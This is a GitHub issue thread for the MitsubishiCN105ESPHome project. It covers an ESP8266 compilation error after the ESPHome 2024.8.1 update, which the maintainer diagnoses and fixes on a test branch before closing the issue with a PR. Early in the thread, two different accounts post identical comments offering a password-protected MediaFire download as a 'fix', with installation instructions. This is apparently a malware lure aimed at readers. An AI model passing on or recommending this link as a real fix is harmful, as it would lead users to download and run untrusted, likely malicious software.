echavet/MitsubishiCN105ESPHome #153: Compilation error ESPHome 2024.8.1

korttoma, 2024-08-28:
Updated ESPHome to version 2024.8.1 and now I can nolonger compile.
Logg attached.
[logs_mitsubishi-heatpump_run.txt](https://github.com/user-attachments/files/16777497/logs_mitsubishi-heatpump_run.txt)

li371359001, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

Satyam1Deepu, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

korttoma, 2024-08-29:
@echavet thank you for looking in to this and for providing this repository in the first place, it is greatly appreciated.

I did already try the cleanup of build files before compilation but issue seems to be the same.
Here is my yaml
[mitsubishi-heatpump.yaml.txt](https://github.com/user-attachments/files/16792580/mitsubishi-heatpump.yaml.txt)

korttoma, 2024-08-29:
I started to think that maybe it is my environment that is somehow broken since no one else is seeing this issue so I restored backup of ESPHome version 2024.7.3 to see if I could compile but the issue is also happening there. So I think it is just my system that is broken somehow but I have no clue how to fix it.

echavet, 2024-08-29:
hi @korttoma 

Could you with the specific version `issue153` please:

```yaml
external_components:
  - source: github://echavet/MitsubishiCN105ESPHome@echavet/issue153
    refresh: 0s
```

thanks

korttoma, 2024-08-29:
result looks the same to me
[logs_mitsubishi-heatpump_run (1).txt](https://github.com/user-attachments/files/16795144/logs_mitsubishi-heatpump_run.1.txt)

echavet, 2024-08-29:
Well I'm sorry but I don't know how to fix this.
I don't understand the "/data/cache/platformio/packages/framework-arduinoespressif8266/cores/esp8266/coredecls.h" ref in your trace.
I would try to clear all .esphome and .platformio rep and try to start again with a clean env.
Perhaps other users will report same pb...
let's see...

korttoma, 2024-08-29:
yeah, I think it has something to do with the 8266 device definition. I created a new device based on esp32 and that one compiles just fine, I might just pull out the 8266 and replace it with an esp32.

echavet, 2024-08-29:
I'm testing with both esp32 and 8266. No compilation pb for both.

gordyf, 2024-09-02:
For what it's worth, I'm also receiving a compilation error with ESPHome 2024.8.1. I tried cleaning build files, and it still fails. Switching to the issue153 branch didn't help. I've attached the compilation logs and configuration. 

[compile-logs.txt](https://github.com/user-attachments/files/16831297/compile-logs.txt)
[configuration.txt](https://github.com/user-attachments/files/16831298/configuration.txt)

korttoma, 2024-09-02:
@gordyf looking at the logs it seems to be the exact same issue I have related to 8266 framework. I replaced my device with a esp32 to get past this for now.

echavet, 2024-09-02:
yes it does help a lot @gordyf 
I'm sorry for this issue.
I'm gonna dig more...

echavet, 2024-09-02:
I still haven't been able to reproduce the issue in my env. It's a very weird; 
whatever, could anyone try to compile again please?
I've had added `using namespace esphome;` for the #148 issue. It may be the cause of this issue.
don't forget the `refresh: 0s`
thanks

korttoma, 2024-09-02:
Here 
[logs_mitsubishi-heatpump_run148.txt](https://github.com/user-attachments/files/16835715/logs_mitsubishi-heatpump_run148.txt)

echavet, 2024-09-02:
thank you @korttoma 
can you confirm the Global.h version you're using doesn't have the line 5 with :
```cpp
using namespace esphome;
```

korttoma, 2024-09-02:
@echavet any clue where I might find that file? I have installed ESPHome as an Add-On for Home Assistant running on HAOS.

echavet, 2024-09-02:
> @echavet any clue where I might find that file? I have installed ESPHome as an Add-On for Home Assistant running on HAOS.

ok, don't worry then. Let is go.

I've just used your (@korttoma) yaml and managed to reproduce the compilation issue.

What I see is that the difference comes from your **_external_components_** section in the yaml file.

Please it is very important to compile with your yaml _**external_components**_ section modified like this:

```yaml
external_components:
  - source: github://echavet/MitsubishiCN105ESPHome@echavet/issue153
    refresh: 0s
```

echavet, 2024-09-02:
When you can compile again I will merge a Pull Request with the modified code in the main branch. But for testing purpose I would need you to setup the github reference to the specific working branch: `github://echavet/MitsubishiCN105ESPHome@echavet/issue153`

korttoma, 2024-09-02:
@echavet It compiled now using the 153. Here is the log.
[logs_mitsubishi-heatpump_run153.txt](https://github.com/user-attachments/files/16836034/logs_mitsubishi-heatpump_run153.txt)

commit 32fe8b8c (2024-09-02): Compilation error ESPHome 2024.8.1
Fixes #153
PR #154 (2024-09-02): Compilation error ESPHome 2024.8.1
Fixes #153
commit caf9eb1a (2024-09-02): Compilation error ESPHome 2024.8.1
Fixes #153
closed 2024-09-02 by echavet